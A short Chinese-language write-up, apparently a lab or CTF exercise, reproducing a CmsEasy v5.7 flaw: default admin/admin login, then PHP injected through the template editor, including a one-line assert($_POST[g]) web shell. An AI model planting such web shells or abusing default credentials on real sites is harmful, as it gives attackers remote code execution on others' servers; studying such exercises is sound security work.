【Web】CmsEasy 漏洞复现

访问主页

到处点一点没啥发现

扫目录

访问/admin

账号密码都是admin admin,不知道为什么,这里就先当作是默认吧

(其实都是信息检索,能在网上搜到就行hhh)

登录成功

看到左边列表有模板,心里大概有数了哈

进行一波历史漏洞的查

CmsEasy_v5.7 漏洞测试

payload1:

复制代码
1111111111";}<?php phpinfo()?>

payload2:

复制代码
11";}<?php assert($_POST[g]);?>

然而蚁剑连不上

在页面里post传g=phpinfo();可以执行

但p=system('xxx');却不能执行(没有disable_functions)

挺奇怪的,可能不是linux系统?

相关推荐
驭渊的小故事5 小时前
简单模板笔记
数据结构·笔记·算法
智者知已应修善业6 小时前
【洛谷P9975奶牛被病毒传染最少数量推导,导出多样例】2025-2-26
c语言·c++·经验分享·笔记·算法·推荐算法
Junlan276 小时前
Cursor使用入门及连接服务器方法(更新中)
服务器·人工智能·笔记
risc1234567 小时前
如何认识结构?结构 = 要素 + 关系 + 动态
笔记
風清掦7 小时前
【江科大STM32学习笔记-05】EXTI外部中断11
笔记·stm32·学习
guizhoumen8 小时前
2026年企业建站如何选择网站建设平台或CMS建站系统
cms·网站建设·网站制作·建站系统·内容管理系统·做网站
wdfk_prog8 小时前
[Linux]学习笔记系列 -- [drivers][tty]sysrq
linux·笔记·学习
迎仔8 小时前
11-云网络与混合云运维:弹性数字世界的交通管理
网络·安全·web安全
QT.qtqtqtqtqt8 小时前
uni-app小程序前端开发笔记(更新中)
前端·笔记·小程序·uni-app
pitch_dark8 小时前
渗透测试系统基础篇——kali系统
网络·安全·web安全